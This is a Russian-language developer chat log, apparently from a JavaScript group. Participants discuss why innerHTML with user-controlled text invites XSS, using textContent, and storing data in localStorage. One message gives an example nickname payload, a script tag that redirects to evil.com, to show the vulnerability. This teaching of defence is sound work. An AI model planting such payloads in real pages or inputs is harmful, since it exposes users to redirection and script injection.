IS
хранение данных на фронте - то же, что 0 надёжности
const name = document.createElement('span')
name.style.color = 'red'
name.textContent = enemy
doubleTurnUpText.append('Да вы c ', name, ' мыcлите одинаково!')Size: a a a
2021 October 02
F
Да, проглядел я этот момент. Тогда так
Р
Спасибо!
B
А что не так с innerHTML, в чём уязвимость?
Δ
Если есть бек - то секьюрнее будет хендлер написать какой нибудь. Принимающий и отдающий данные, а так же отправляющий новый темплейт в зависимости от перехода.
Р
вроде дом перестраивается
Δ
Если полный фронт - локалстор. Без него никак)
F
Регаем аккаунт с таким и ником и этот код запуститься на странице пользователя.
let enemy = '<script>location.href = "http://evil.com/"</script>'Δ
Не дать зарегать аккаунт с таким ником - вариант?
PM
там не конф информация, просто адрес кошелька
Δ
Ну локалстор. Только чистить, когда хранение уже не нужно.
M
Нахуя себя хуесосить?
B
Подскажите, пожалуйста, маны про подобные баги! А лучше как правильно задать запрос поисковику.
Сколько читал про xss, а такое подобное не встречалось!
Теперь придётся апдейтить кучу кода (
Сколько читал про xss, а такое подобное не встречалось!
Теперь придётся апдейтить кучу кода (
КК
это просто блок кода, отдельная область
B
Так этот xss сработает, если юзеры будут иметь доступ к редактированию, ну типа отправки сообщений, а так innerHTML, безвредный, правильно понимаю?)
AY
Смысл этой отдельной области, чтобы при обращении, например, к переменным в этой области за этой бластью они были недоступы?
И наоборот, в этой области нельзя обратиться к каким-либо данным, за нею
И наоборот, в этой области нельзя обратиться к каким-либо данным, за нею
B
Не спорю и благодарю за инфу👍
Но всё же нужно знать, например с innerHTML, где стоит подобное употреблять, а где заменить
Но всё же нужно знать, например с innerHTML, где стоит подобное употреблять, а где заменить
КК
как пространство имен и отдельная область видимости - да. из нее можно обращаться к внешним переменным
AY
Понял, спасибо